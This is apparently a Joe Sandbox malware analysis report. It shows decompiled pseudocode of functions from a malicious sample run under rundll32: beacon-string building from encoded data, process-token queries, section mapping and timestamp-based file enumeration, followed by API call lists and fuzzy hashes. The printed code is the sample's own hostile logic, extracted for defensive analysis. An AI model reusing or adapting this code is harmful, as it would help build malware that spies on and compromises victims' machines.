				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x408d2a0; // 0x59935a40
				_t74 = RtlAllocateHeap( *0x408d238, 0, _t72 ^ 0x59935b44);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x408d2a0; // 0x59935a40
				_t78 = RtlAllocateHeap( *0x408d238, 0, _t76 ^ 0x59935a4d);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x408d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x408d2a0; // 0x59935a40
				memset(_t78, 0, _t136 ^ 0x59935a4d);
				_t81 =  *0x408d2a4; // 0xbfa5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x408e7e8; // 0x73797325
				_t83 = E040877E6(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x408d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x59935a4d;
				_v28.dwHighDateTime = 0x59935a4d;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x59935a4d) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x408d2a4; // 0xbfa5a8
				_t16 = _t93 + 0x408e809; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                          0x040832c3
                                          0x040832c9
                                          0x040832cb
                                          0x040832e5
                                          0x040832e7
                                          0x040832ec
                                          0x04083561
                                          0x04083568
                                          0x04083568
                                          0x040832f2
                                          0x04083307
                                          0x04083309
                                          0x0408330b
                                          0x04083310
                                          0x04083551
                                          0x0408355b
                                          0x00000000
                                          0x0408355b
                                          0x04083316
                                          0x04083321
                                          0x04083326
                                          0x0408332b
                                          0x0408332e
                                          0x04083335
                                          0x0408333a
                                          0x0408333f
                                          0x04083541
                                          0x0408354b
                                          0x00000000
                                          0x0408354b
                                          0x04083355
                                          0x04083359
                                          0x0408335c
                                          0x0408335f
                                          0x04083365
                                          0x0408336a
                                          0x04083373
                                          0x04083379
                                          0x04083383
                                          0x0408338a
                                          0x0408338a
                                          0x0408339c
                                          0x040833a7
                                          0x040833b5
                                          0x040833ba
                                          0x040833bf
                                          0x040833c2
                                          0x040833c7
                                          0x040833d1
                                          0x040833d4
                                          0x040833d7
                                          0x040833ed
                                          0x040833ef
                                          0x040833f4
                                          0x0408353f
                                          0x00000000
                                          0x0408353f
                                          0x0408340b
                                          0x0408345c
                                          0x0408341f
                                          0x04083427
                                          0x0408342c
                                          0x0408343a
                                          0x04083443
                                          0x0408344c
                                          0x0408344c
                                          0x0408345a
                                          0x0408345a
                                          0x04083460
                                          0x04083464
                                          0x04083464
                                          0x0408346a
                                          0x00000000
                                          0x00000000
                                          0x0408346c
                                          0x04083472
                                          0x04083519
                                          0x0408351c
                                          0x04083529
                                          0x04083529
                                          0x0408352d
                                          0x00000000
                                          0x00000000
                                          0x04083522
                                          0x04083526
                                          0x04083526
                                          0x04083528
                                          0x04083528
                                          0x04083532
                                          0x04083539
                                          0x0408353b
                                          0x00000000
                                          0x0408353b
                                          0x04083478
                                          0x0408347a
                                          0x0408347a
                                          0x0408348d
                                          0x04083493
                                          0x0408349e
                                          0x040834a0
                                          0x040834a4
                                          0x040834a6
                                          0x040834a6
                                          0x040834ab
                                          0x040834ad
                                          0x040834ad
                                          0x040834ab
                                          0x040834b2
                                          0x040834b6
                                          0x040834b6
                                          0x040834c6
                                          0x040834cb
                                          0x040834ce
                                          0x040834ce
                                          0x040834d1
                                          0x040834db
                                          0x040834e3
                                          0x040834e8
                                          0x040834f6
                                          0x040834f6
                                          0x0408350a
                                          0x0408350e
                                          0x0408350e

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 040832E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04083307
                                          • memset.NTDLL ref: 04083321
                                            • Part of subcall function 040877E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0408333A,73797325), ref: 040877F7
                                            • Part of subcall function 040877E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04087811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0408335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04083373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 0408338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04083396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 040833D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 040833ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 0408340B
                                          • FindNextFileA.KERNEL32(0408207E,?), ref: 0408341F
                                          • FindClose.KERNEL32(0408207E), ref: 0408342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04083438
                                          • CompareFileTime.KERNEL32(?,?), ref: 0408345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 0408348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 040834C6
                                          • FindNextFileA.KERNELBASE(0408207E,?), ref: 040834DB
                                          • FindClose.KERNEL32(0408207E), ref: 040834E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 040834F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 04083504
                                          • FindClose.KERNEL32(0408207E), ref: 04083539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 0408354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 0408355B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: 640ce32a1b9341df48a89af6c659e594b23f140e0248bd51d996eb9c3331aa4f
                                          • Instruction ID: 165300c744b0e4f2ad980272e05e9c16f4f2630f6160bc880c85c1109090d398
                                          • Opcode Fuzzy Hash: 640ce32a1b9341df48a89af6c659e594b23f140e0248bd51d996eb9c3331aa4f
                                          • Instruction Fuzzy Hash: 94813D71D00219AFEB11AFA4DD44AEEBBB9EF44700F10456DE985F6250E739AA44CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040871B9, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E040871B9(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E040858BE(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E0408147E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                          0x040871c6
                                          0x040871c7
                                          0x040871c8
                                          0x040871c9
                                          0x040871ca
                                          0x040871ce
                                          0x040871d5
                                          0x040871e4
                                          0x040871e7
                                          0x040871ea
                                          0x040871f1
                                          0x040871f4
                                          0x040871f7
                                          0x040871fa
                                          0x040871fd
                                          0x04087208
                                          0x0408720a
                                          0x04087213
                                          0x0408721b
                                          0x0408721d
                                          0x0408722f
                                          0x04087239
                                          0x0408723d
                                          0x0408724c
                                          0x04087250
                                          0x04087259
                                          0x04087261
                                          0x04087261
                                          0x04087263
                                          0x04087263
                                          0x0408726b
                                          0x04087271
                                          0x04087275
                                          0x04087275
                                          0x04087280

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04087200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04087213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0408722F
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0408724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 04087259
                                          • NtClose.NTDLL(?), ref: 0408726B
                                          • NtClose.NTDLL(00000000), ref: 04087275
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 26b2574642a131a17775a8a9dcac4268d38a8ac41d1c739cd1e069cddc6bbe5a
                                          • Instruction ID: 37215b552f1b28f69c65c64841d696e7e8897465feb94268cbddbf2abce93057
                                          • Opcode Fuzzy Hash: 26b2574642a131a17775a8a9dcac4268d38a8ac41d1c739cd1e069cddc6bbe5a
                                          • Instruction Fuzzy Hash: 0D2116B290021CBBEF01AF94CE859DEBFBDEF58744F10402AFA40B6150D7759A809BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00511A34, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E00511A34(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E005110BA(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                          0x00511a3d
                                          0x00511a44
                                          0x00511a45
                                          0x00511a46
                                          0x00511a47
                                          0x00511a48
                                          0x00511a59
                                          0x00511a5d
                                          0x00511a71
                                          0x00511a74
                                          0x00511a77
                                          0x00511a7e
                                          0x00511a81
                                          0x00511a88
                                          0x00511a8b
                                          0x00511a8e
                                          0x00511a91
                                          0x00511a96
                                          0x00511ad1
                                          0x00511a98
                                          0x00511a9b
                                          0x00511aa1
                                          0x00511aa6
                                          0x00511aaa
                                          0x00511ac8
                                          0x00511aac
                                          0x00511ab3
                                          0x00511ac1
                                          0x00511ac1
                                          0x00511aaa
                                          0x00511ad9

                                          APIs
                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00511A91
                                            • Part of subcall function 005110BA: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 005110E7
                                          • memset.NTDLL ref: 00511AB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: Section$CreateViewmemset
                                          • String ID: @
                                          • API String ID: 2533685722-2766056989
                                          • Opcode ID: f77f55ab3ccb546c3d8c576f84e5351407dfacedabb99d7fd493fd0a52462a6f
                                          • Instruction ID: 4c29ea65105ca8ee611ee51dc0dff6a5506e08c5492d0903e0f10630dffe5b08
                                          • Opcode Fuzzy Hash: f77f55ab3ccb546c3d8c576f84e5351407dfacedabb99d7fd493fd0a52462a6f
                                          • Instruction Fuzzy Hash: B221F9B5D00609AFDB11DFA9C8849DEFFB9FF48354F104869E615F3210D7319A448BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005110BA, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E005110BA(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                          0x005110cc
                                          0x005110d2
                                          0x005110e0
                                          0x005110e7
                                          0x005110ec
                                          0x005110f2
                                          0x00000000
                                          0x005110f3
                                          0x00000000

                                          APIs
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 005110E7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: SectionView
                                          • String ID:
                                          • API String ID: 1323581903-0
                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction ID: 402602140221e905d75c1dc1ca5347f99c8743e80e61bee59904685da2187a1f
                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction Fuzzy Hash: 5DF012B590060DBFEB119FA5CC89C9FBBBDEB48394B104979B252E1090D6309E489A60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04081754, Relevance: 33.2, APIs: 22, Instructions: 248memorystringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04081754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t68;
				intOrPtr _t69;
				int _t72;
				void* _t73;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr _t95;
				void* _t97;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				signed int _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				CHAR* _t136;
				intOrPtr _t137;
				void* _t138;
				void* _t147;
				int _t148;
				void* _t149;
				intOrPtr _t150;
				void* _t152;
				long _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t161;
				void* _t162;
				void* _t164;

				_t147 = __edx;
				_t138 = __ecx;
				_t60 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t60 = GetTickCount();
				}
				_t61 =  *0x408d018; // 0x3df0b315
				asm("bswap eax");
				_t62 =  *0x408d014; // 0x3a87c8cd
				_t136 = _a16;
				asm("bswap eax");
				_t63 =  *0x408d010; // 0xd8d2f808
				asm("bswap eax");
				_t64 =  *0x408d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t65 =  *0x408d2a4; // 0xbfa5a8
				_t3 = _t65 + 0x408e633; // 0x74666f73
				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x408d02c,  *0x408d004, _t60);
				_t68 = E040857AB();
				_t69 =  *0x408d2a4; // 0xbfa5a8
				_t4 = _t69 + 0x408e673; // 0x74707526
				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
				_t164 = _t162 + 0x38;
				_t149 = _t148 + _t72; // executed
				_t73 = E040873E9(_t138); // executed
				_t137 = __imp__;
				_v8 = _t73;
				if(_t73 != 0) {
					_t130 =  *0x408d2a4; // 0xbfa5a8
					_t7 = _t130 + 0x408e8cb; // 0x736e6426
					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
					_t164 = _t164 + 0xc;
					_t149 = _t149 + _t134;
					HeapFree( *0x408d238, 0, _v8);
				}
				_t74 = E0408614A();
				_v8 = _t74;
				if(_t74 != 0) {
					_t125 =  *0x408d2a4; // 0xbfa5a8
					_t11 = _t125 + 0x408e8d3; // 0x6f687726
					wsprintfA(_t149 + _a16, _t11, _t74);
					_t164 = _t164 + 0xc;
					HeapFree( *0x408d238, 0, _v8);
				}
				_t150 =  *0x408d324; // 0x4c895b0
				_t76 = E0408757B(0x408d00a, _t150 + 4);
				_t156 = 0;
				_v20 = _t76;
				if(_t76 == 0) {
					L26:
					RtlFreeHeap( *0x408d238, _t156, _a16); // executed
					return _v12;
				} else {
					_t79 = RtlAllocateHeap( *0x408d238, 0, 0x800);
					_v8 = _t79;
					if(_t79 == 0) {
						L25:
						HeapFree( *0x408d238, _t156, _v20);
						goto L26;
					}
					E0408749F(GetTickCount());
					_t83 =  *0x408d324; // 0x4c895b0
					__imp__(_t83 + 0x40);
					asm("lock xadd [eax], ecx");
					_t87 =  *0x408d324; // 0x4c895b0
					__imp__(_t87 + 0x40);
					_t89 =  *0x408d324; // 0x4c895b0
					_t152 = E04084D2C(1, _t147, _a16,  *_t89);
					_v28 = _t152;
					asm("lock xadd [eax], ecx");
					if(_t152 == 0) {
						L24:
						HeapFree( *0x408d238, _t156, _v8);
						goto L25;
					}
					StrTrimA(_t152, 0x408c294);
					_t95 =  *0x408d2a4; // 0xbfa5a8
					_push(_t152);
					_t18 = _t95 + 0x408e252; // 0x616d692f
					_t97 = E04089DEF(_t18);
					_v16 = _t97;
					if(_t97 == 0) {
						L23:
						HeapFree( *0x408d238, _t156, _t152);
						goto L24;
					}
					_t157 = __imp__;
					 *_t157(_t152, _a4);
					 *_t157(_v8, _v20);
					_t158 = __imp__;
					 *_t158(_v8, _v16);
					 *_t158(_v8, _t152);
					_t104 = E0408A5E9(0, _v8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v12 = 8;
						L21:
						E04086106();
						L22:
						HeapFree( *0x408d238, 0, _v16);
						_t156 = 0;
						goto L23;
					}
					_t108 = E04082F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
					_v12 = _t108;
					if(_t108 == 0) {
						_t161 = _v24;
						_t115 = E0408A060(_t161, _a4, _a8, _a12); // executed
						_v12 = _t115;
						_t116 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t161 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t161;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E0408147E(_t161);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t110 = _a8;
							if(_t110 != 0) {
								_t153 =  *_t110;
								_t159 =  *_a12;
								wcstombs( *_t110,  *_t110,  *_a12);
								_t113 = E04081600(_t153, _t153, _t159 >> 1);
								_t152 = _v28;
								 *_a12 = _t113;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E0408147E(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}























































                                          0x04081754
                                          0x04081754
                                          0x04081754
                                          0x0408175d
                                          0x04081766
                                          0x04081768
                                          0x04081768
                                          0x04081775
                                          0x04081780
                                          0x04081783
                                          0x04081788
                                          0x04081791
                                          0x04081794
                                          0x04081799
                                          0x0408179c
                                          0x040817a1
                                          0x040817a4
                                          0x040817b0
                                          0x040817bd
                                          0x040817bf
                                          0x040817c5
                                          0x040817ca
                                          0x040817d5
                                          0x040817d7
                                          0x040817da
                                          0x040817dc
                                          0x040817e1
                                          0x040817e7
                                          0x040817ec
                                          0x040817ef
                                          0x040817f4
                                          0x04081801
                                          0x04081803
                                          0x04081809
                                          0x04081813
                                          0x04081813
                                          0x04081815
                                          0x0408181a
                                          0x0408181f
                                          0x04081822
                                          0x04081827
                                          0x04081834
                                          0x04081836
                                          0x04081844
                                          0x04081844
                                          0x04081846
                                          0x04081854
                                          0x04081859
                                          0x0408185b
                                          0x04081860
                                          0x04081a2f
                                          0x04081a39
                                          0x04081a42
                                          0x04081866
                                          0x04081872
                                          0x04081878
                                          0x0408187d
                                          0x04081a23
                                          0x04081a2d
                                          0x00000000
                                          0x04081a2d
                                          0x04081889
                                          0x0408188e
                                          0x04081897
                                          0x040818a8
                                          0x040818ac
                                          0x040818b5
                                          0x040818bb
                                          0x040818ca
                                          0x040818d1
                                          0x040818da
                                          0x040818e0
                                          0x04081a17
                                          0x04081a21
                                          0x00000000
                                          0x04081a21
                                          0x040818ec
                                          0x040818f2
                                          0x040818f7
                                          0x040818f8
                                          0x040818ff
                                          0x04081904
                                          0x04081909
                                          0x04081a0d
                                          0x04081a15
                                          0x00000000
                                          0x04081a15
                                          0x04081912
                                          0x04081919
                                          0x04081921
                                          0x04081926
                                          0x0408192f
                                          0x04081935
                                          0x0408193c
                                          0x04081941
                                          0x04081946
                                          0x04081a45
                                          0x040819f9
                                          0x040819f9
                                          0x040819fe
                                          0x04081a09
                                          0x04081a0b
                                          0x00000000
                                          0x04081a0b
                                          0x04081950
                                          0x04081955
                                          0x0408195a
                                          0x0408195f
                                          0x0408196a
                                          0x0408196f
                                          0x04081972
                                          0x04081978
                                          0x0408197e
                                          0x04081984
                                          0x04081987
                                          0x0408198d
                                          0x04081990
                                          0x04081995
                                          0x04081999
                                          0x04081999
                                          0x040819a5
                                          0x040819b1
                                          0x040819b5
                                          0x040819b7
                                          0x040819bc
                                          0x040819be
                                          0x040819c3
                                          0x040819c8
                                          0x040819d5
                                          0x040819dd
                                          0x040819e0
                                          0x040819e0
                                          0x040819bc
                                          0x00000000
                                          0x040819a7
                                          0x040819ab
                                          0x040819e2
                                          0x040819e5
                                          0x040819ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x040819ee
                                          0x040819ad
                                          0x00000000
                                          0x040819ad
                                          0x040819a5

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04081768
                                          • wsprintfA.USER32 ref: 040817B8
                                          • wsprintfA.USER32 ref: 040817D5
                                          • wsprintfA.USER32 ref: 04081801
                                          • HeapFree.KERNEL32(00000000,?), ref: 04081813
                                          • wsprintfA.USER32 ref: 04081834
                                          • HeapFree.KERNEL32(00000000,?), ref: 04081844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04081872
                                          • GetTickCount.KERNEL32 ref: 04081883
                                          • RtlEnterCriticalSection.NTDLL(04C89570), ref: 04081897
                                          • RtlLeaveCriticalSection.NTDLL(04C89570), ref: 040818B5
                                            • Part of subcall function 04084D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,040852FE,?,04C895B0), ref: 04084D57
                                            • Part of subcall function 04084D2C: lstrlen.KERNEL32(?,?,?,040852FE,?,04C895B0), ref: 04084D5F
                                            • Part of subcall function 04084D2C: strcpy.NTDLL ref: 04084D76
                                            • Part of subcall function 04084D2C: lstrcat.KERNEL32(00000000,?), ref: 04084D81
                                            • Part of subcall function 04084D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,040852FE,?,04C895B0), ref: 04084D9E
                                          • StrTrimA.SHLWAPI(00000000,0408C294,?,04C895B0), ref: 040818EC
                                            • Part of subcall function 04089DEF: lstrlen.KERNEL32(?,00000000,00000000,04085335,616D692F,00000000), ref: 04089DFB
                                            • Part of subcall function 04089DEF: lstrlen.KERNEL32(?), ref: 04089E03
                                            • Part of subcall function 04089DEF: lstrcpy.KERNEL32(00000000,?), ref: 04089E1A
                                            • Part of subcall function 04089DEF: lstrcat.KERNEL32(00000000,?), ref: 04089E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04081919
                                          • lstrcpy.KERNEL32(?,?), ref: 04081921
